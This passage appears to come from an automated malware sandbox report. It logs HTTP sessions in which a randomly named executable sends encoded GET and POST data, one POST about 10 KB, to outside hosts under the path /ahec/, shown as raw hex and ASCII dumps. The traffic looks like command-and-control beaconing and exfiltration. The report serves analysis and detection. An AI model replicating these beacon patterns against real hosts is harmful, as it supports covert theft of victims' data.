                                                                                                                                                            Data Ascii: XveXHZvx=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
                                                                                                                                                            Dec 8, 2023 14:52:38.162178040 CET225INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx/1.14.1
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:38 GMT
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Connection: close
                                                                                                                                                            X-Rate-Limit-Limit: 5s
                                                                                                                                                            X-Rate-Limit-Remaining: 19
                                                                                                                                                            X-Rate-Limit-Reset: 2023-12-08T13:52:43.0141623Z


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            36192.168.2.44977685.159.66.93805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:52:40.619764090 CET471OUTGET /ahec/?XveXHZvx=AHFK2pjoxw5zzLKkvof1eZxXaE20EUKFIXzrT8sRZEqLGYv6y8nhVjDsidhHFHxwb+HDFiGiPRNZnrHWQBMnDP8n7IChKCrxhg==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.magmadokum.com
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Dec 8, 2023 14:52:40.898921013 CET225INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx/1.14.1
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:40 GMT
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Connection: close
                                                                                                                                                            X-Rate-Limit-Limit: 5s
                                                                                                                                                            X-Rate-Limit-Remaining: 19
                                                                                                                                                            X-Rate-Limit-Reset: 2023-12-08T13:52:45.7508499Z


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            37192.168.2.449777162.241.252.161805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:52:47.184953928 CET762OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.thecoloringbitch.com
                                                                                                                                                            Origin: http://www.thecoloringbitch.com
                                                                                                                                                            Referer: http://www.thecoloringbitch.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 71 44 64 4b 75 39 30 73 72 47 53 47 69 50 32 2f 43 45 5a 2f 62 71 54 50 4c 2b 30 34 71 56 4b 73 54 68 4b 4b 63 73 56 34 63 4a 79 6b 49 50 43 72 5a 30 6c 76 38 36 4c 33 42 73 76 76 50 73 56 7a 64 61 75 37 4c 57 68 59 6d 50 63 53 78 44 46 79 6a 5a 77 69 55 6f 43 75 58 75 6d 67 44 30 44 4b 6d 6e 7a 64 55 33 30 69 52 68 7a 64 77 61 76 70 73 2f 66 75 67 6b 6e 74 71 67 32 65 4a 2f 31 6f 61 30 6d 6e 6d 49 49 50 68 4a 74 64 4c 36 47 31 4a 6b 56 51 6d 6c 55 45 53 69 66 52 57 46 6d 70 4a 61 37 31 6c 61 4c 5a 63 7a 45 39 48 6a 59 6a 32 51 3d 3d
                                                                                                                                                            Data Ascii: XveXHZvx=qDdKu90srGSGiP2/CEZ/bqTPL+04qVKsThKKcsV4cJykIPCrZ0lv86L3BsvvPsVzdau7LWhYmPcSxDFyjZwiUoCuXumgD0DKmnzdU30iRhzdwavps/fugkntqg2eJ/1oa0mnmIIPhJtdL6G1JkVQmlUESifRWFmpJa71laLZczE9HjYj2Q==
                                                                                                                                                            Dec 8, 2023 14:52:47.394695997 CET479INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:47 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 315
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            38192.168.2.449778162.241.252.161805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:52:49.898237944 CET782OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.thecoloringbitch.com
                                                                                                                                                            Origin: http://www.thecoloringbitch.com
                                                                                                                                                            Referer: http://www.thecoloringbitch.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 71 44 64 4b 75 39 30 73 72 47 53 47 6b 75 47 2f 45 6e 78 2f 53 71 54 4d 56 75 30 34 67 31 4b 6f 54 68 47 4b 63 75 35 53 64 38 69 6b 49 75 53 72 59 78 52 76 2f 36 4c 33 55 63 76 51 4c 73 55 2f 64 61 7a 49 4c 55 31 59 6d 4c 30 53 78 47 70 79 6b 75 63 74 58 59 43 6f 61 4f 6d 6d 48 30 44 4b 6d 6e 7a 64 55 33 67 45 52 67 62 64 78 71 2f 70 73 64 33 70 38 55 6e 79 67 41 32 65 59 50 31 73 61 30 6e 58 6d 4d 41 68 68 50 68 64 4c 37 32 31 4a 78 35 54 73 6c 55 47 57 69 65 47 54 30 32 6d 50 49 61 66 6f 38 2b 7a 61 6e 56 4e 47 32 30 77 78 70 4e 61 35 66 46 62 75 6d 44 77 79 59 42 4d 44 54 48 6b 66 49 77 3d
                                                                                                                                                            Data Ascii: XveXHZvx=qDdKu90srGSGkuG/Enx/SqTMVu04g1KoThGKcu5Sd8ikIuSrYxRv/6L3UcvQLsU/dazILU1YmL0SxGpykuctXYCoaOmmH0DKmnzdU3gERgbdxq/psd3p8UnygA2eYP1sa0nXmMAhhPhdL721Jx5TslUGWieGT02mPIafo8+zanVNG20wxpNa5fFbumDwyYBMDTHkfIw=
                                                                                                                                                            Dec 8, 2023 14:52:50.103866100 CET479INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:49 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 315
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            39192.168.2.449779162.241.252.161805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:52:52.618525028 CET10864OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.thecoloringbitch.com
                                                                                                                                                            Origin: http://www.thecoloringbitch.com
                                                                                                                                                            Referer: http://www.thecoloringbitch.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 10289
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 71 44 64 4b 75 39 30 73 72 47 53 47 6b 75 47 2f 45 6e 78 2f 53 71 54 4d 56 75 30 34 67 31 4b 6f 54 68 47 4b 63 75 35 53 64 38 71 6b 4c 5a 53 72 58 79 4a 76 2b 36 4c 33 56 63 76 56 4c 73 56 6c 64 61 72 45 4c 55 6f 6a 6d 4e 77 53 33 67 39 79 68 63 6b 74 4d 49 43 6f 54 75 6d 6a 44 30 43 58 6d 6e 6a 5a 55 33 77 45 52 67 62 64 78 6f 58 70 38 66 66 70 76 45 6e 74 71 67 32 73 4a 2f 31 45 61 30 2b 76 6d 4d 4d 66 68 2f 42 64 4b 62 6d 31 4b 44 42 54 78 31 55 59 59 43 65 4f 54 30 37 6d 50 49 47 35 6f 38 6a 57 61 6b 4a 4e 44 44 4e 59 73 4a 46 4f 6c 36 6c 46 75 6c 6e 53 32 6f 51 43 65 69 66 38 64 75 41 53 31 67 50 7a 4b 56 78 32 50 45 30 46 64 73 51 76 45 4f 4f 37 58 76 6c 5a 74 56 30 57 42 44 49 43 61 6d 72 49 57 5a 74 67 63 31 32 69 7a 5a 30 6a 55 57 33 59 70 79 53 2b 64 7a 6a 38 45 4c 50 51 77 44 6c 2f 2f 51 4c 74 6b 78 4d 62 70 33 37 6b 48 75 77 73 52 4c 46 70 56 50 70 70 35 6c 39 4e 68 53 43 4a 57 68 2f 57 4a 64 46 7a 33 59 74 39 32 77 47 49 34 58 73 75 58 33 35 33 31 32 5a 33 55 59 73 58 73 62 35 77 48 64 66 67 72 43 55 67 43 74 6e 74 4f 55 49 6c 61 5a 70 36 6e 5a 4d 43 6f 68 35 7a 4f 4c 78 31 31 4b 36 63 6b 48 4a 4a 53 46 47 6c 73 45 33 41 6f 45 78 32 55 62 53 47 2b 4b 64 43 44 71 35 4e 75 76 61 59 31 6c 44 69 68 54 6e 68 49 34 55 6b 78 53 41 76 44 62 61 72 41 46 74 47 54 62 2f 38 70 63 52 6f 67 36 67 56 52 44 52 6f 67 35 66 78 36 58 70 48 48 6f 6e 5a 70 37 2b 62 76 6b 2f 4d 37 55 68 6d 46 64 2b 50 4d 62 62 66 4e 76 75 54 32 77 35 31 52 56 4f 2b 73 6d 4e 48 4d 39 53 59 54 4c 31 42 76 70 56 46 38 32 75 2f 4f 61 70 4c 37 30 50 35 55 59 72 61 73 72 42 51 36 45 30 5a 51 6f 6b 49 63 70 36 38 2b 52 33 61 38 42 69 67 48 45 35 67 55 4f 41 6e 4e 4c 79 78 35 68 4b 64 59 47 77 50 67 38 56 58 44 34 4f 44 75 63 63 6e 34 50 75 33 54 31 36 2f 7a 54 53 68 4e 34 61 78 58 4d 6c 6d 76 50 63 4b 48 4b 58 39 57 72 46 79 59 65 52 57 56 4e 4a 61 70 47 35 55 45 72 6b 70 61 73 35 4a 33 4f 39 54 4b 68 6d 55 74 35 68 64 50 56 47 66 33 7a 36 2f 70 4a 64 36 73 33 57 71 41 56 52 4a 68 4e 37 79 4a 72 59 79 51 77 49 72 51 59 52 43 41 44 79 75 68 35 65 66 44 44 6b 77 58 34 32 76 58 34 53 6f 48 54 46 74 38 51 59 62 2f 42 64 47 36 36 73 52 75 46 50 58 50 35 72 4f 52 38 61 71 42 69 4f 52 64 34 4c 72 52 53 34 50 33 79 6e 61 67 51 78 6c 53 56 44 34 54 48 6b 36 44 6c 61 4c 7a 45 72 4f 2b 55 67 32 50 56 6d 67 76 68 47 57 59 65 53 4f 48 31 2b 39 31 69 66 69 38 54 44 56 55 30 6f 6e 6b 46 32 44 4c 77 75 79 30 39 50 4b 4a 52 41 48 50 47 4c 59 6b 79 41 69 77 39 69 61 6c 4e 39 79 59 37 36 53 61 6b 50 44 56 69 42 7a 50 68 32 6b 66 62 36 34 2f 4e 64 67 52 7a 43 43 48 51 39 65 48 62 62 38 4e 78 4a 50 57 72 55 41 58 62 33 39 65 64 38 36 42 7a 54 4b 31 53 4d 6e 50 30 70 62 6d 2b 4e 77 72 72 6d 30 2f 68 6f 6b 70 44 41 51 79 77 68 38 6b 64 50 31 6b 62 39 59 4c 75 4a 77 69 72 41 6b 63 72 69 45 6d 55 58 67 46 49 78 44 59 73 59 66 6a 45 56 57 41 66 79 34 2f 30 38 32 69 43 72 42 45 7a 66 67 63 6e 68 37 54 48 71 50 71 71 39 70 74 6c 4d 32 36 42 44 31 73 45 67 46 4c 6b 5a 78 34 48 63 6b 2b 55 69 71 59 77 50 49 6d 2f 41 4c 43 6c 62 35 4c 32 50 66 45 4c 45 6a 41 64 2f 57 2f 4b 55 69 72 44 54 47 2b 49 77 54 72 5a 52 2f 63 73 37 74 54 33 38 59 67 71 4d 56 75 47 75 52 4a 6b 54 77 4d 37 6d 73 54 31 65 4d 67 38 58 73 41 39 77 30 42 46 2f 38 49 65 53 47 4f 6e 63 5a 5a 34 6f 6a 4f 53 4b 6a 47 6f 2f 4c 79 33 52 68 74 62 31 46 78 42 6d 6c 54 71 79 69 32 4a 2f 4f 6a 58 76 4c 6a 38 71 77 55 55 45 64 65 6a 32 77 58 58 45 58 53 36 6f 6a 6e 73 6e 71 5a 31 48 33 72 77 4a 32 36 47 41 67 72 73 6e 67 61 69 49 6c 6b 45 74 70 4f 4e 58 73 4b 68 41 4f 66 75 67 2f 30 39 74 72 59 50 63 78 2f 4e 62 4d 48 75 33 76 4c 77 43 2f 76 41 71 6d 6b 43 4a 49 4f 58 70 47 72 2b 36 42 7a 31 4c 4f 39 36 4a 32 76 4a 4a 79 76 7a 34 35 41 56 68 30 41 4e 6a 59 5a 45 51 31 79 63 4f 52 4c 36 4b 39 6c 54 67 57 50 71 4f 51 68 5a 6f 53 44 72 6f 46 31 4c 47 64 35 6f 2b 46 41 78 44 6e 33 49 7a 63 62 43 51 33 4f 43 76 61 7a 4f 78 55 52 4b 58 55 45 59 63 36 70 39 2f 39 34 49 73 65 33 39 36 50 48 5a 42 5a 63 65 41 4e 4f 58 4f 68 72 38 53 54 2f 4e 64 51 31 4a 66 55 34 2b 2f 57 51 59 6f 59 79 77 45 58 63 4e
                                                                                                                                                            Data Ascii: XveXHZvx=qDdKu90srGSGkuG/Enx/SqTMVu04g1KoThGKcu5Sd8qkLZSrXyJv+6L3VcvVLsVldarELUojmNwS3g9yhcktMICoTumjD0CXmnjZU3wERgbdxoXp8ffpvEntqg2sJ/1Ea0+vmMMfh/BdKbm1KDBTx1UYYCeOT07mPIG5o8jWakJNDDNYsJFOl6lFulnS2oQCeif8duAS1gPzKVx2PE0FdsQvEOO7XvlZtV0WBDICamrIWZtgc12izZ0jUW3YpyS+dzj8ELPQwDl//QLtkxMbp37kHuwsRLFpVPpp5l9NhSCJWh/WJdFz3Yt92wGI4XsuX35312Z3UYsXsb5wHdfgrCUgCtntOUIlaZp6nZMCoh5zOLx11K6ckHJJSFGlsE3AoEx2UbSG+KdCDq5NuvaY1lDihTnhI4UkxSAvDbarAFtGTb/8pcRog6gVRDRog5fx6XpHHonZp7+bvk/M7UhmFd+PMbbfNvuT2w51RVO+smNHM9SYTL1BvpVF82u/OapL70P5UYrasrBQ6E0ZQokIcp68+R3a8BigHE5gUOAnNLyx5hKdYGwPg8VXD4ODuccn4Pu3T16/zTShN4axXMlmvPcKHKX9WrFyYeRWVNJapG5UErkpas5J3O9TKhmUt5hdPVGf3z6/pJd6s3WqAVRJhN7yJrYyQwIrQYRCADyuh5efDDkwX42vX4SoHTFt8QYb/BdG66sRuFPXP5rOR8aqBiORd4LrRS4P3ynagQxlSVD4THk6DlaLzErO+Ug2PVmgvhGWYeSOH1+91ifi8TDVU0onkF2DLwuy09PKJRAHPGLYkyAiw9ialN9yY76SakPDViBzPh2kfb64/NdgRzCCHQ9eHbb8NxJPWrUAXb39ed86BzTK1SMnP0pbm+Nwrrm0/hokpDAQywh8kdP1kb9YLuJwirAkcriEmUXgFIxDYsYfjEVWAfy4/082iCrBEzfgcnh7THqPqq9ptlM26BD1sEgFLkZx4Hck+UiqYwPIm/ALClb5L2PfELEjAd/W/KUirDTG+IwTrZR/cs7tT38YgqMVuGuRJkTwM7msT1eMg8XsA9w0BF/8IeSGOncZZ4ojOSKjGo/Ly3Rhtb1FxBmlTqyi2J/OjXvLj8qwUUEdej2wXXEXS6ojnsnqZ1H3rwJ26GAgrsngaiIlkEtpONXsKhAOfug/09trYPcx/NbMHu3vLwC/vAqmkCJIOXpGr+6Bz1LO96J2vJJyvz45AVh0ANjYZEQ1ycORL6K9lTgWPqOQhZoSDroF1LGd5o+FAxDn3IzcbCQ3OCvazOxURKXUEYc6p9/94Ise396PHZBZceANOXOhr8ST/NdQ1JfU4+/WQYoYywEXcNn0NTkbiFUVTUIxvlfiDhjcc2j6PNXyqESHbu2mkd7mrRGitaSuLgXK5okwrse9BDnf9Sh6PNKaf1YNslnzwVnbearObUKgMTmBqqiTLmmD83x+JFRB8UQRVl0Ym8uIDC5TdLnHomAQWTMrYL+w/2aGa9+7Yf4J0csrzv+MuQhqj0i23cAsCriajnx99QVrC3BMvwON8qQtEcNUAJVnhL7Y2bhUJkCYEkkKNVfpx4mBa+xLw4h5LQlcdRS2aFBYI+CJ8oodbwMyOEns+Xgm8nAJsoLRJpA1t5jkWwpQ9pmmf2cmtbmda0j+P+Or20tL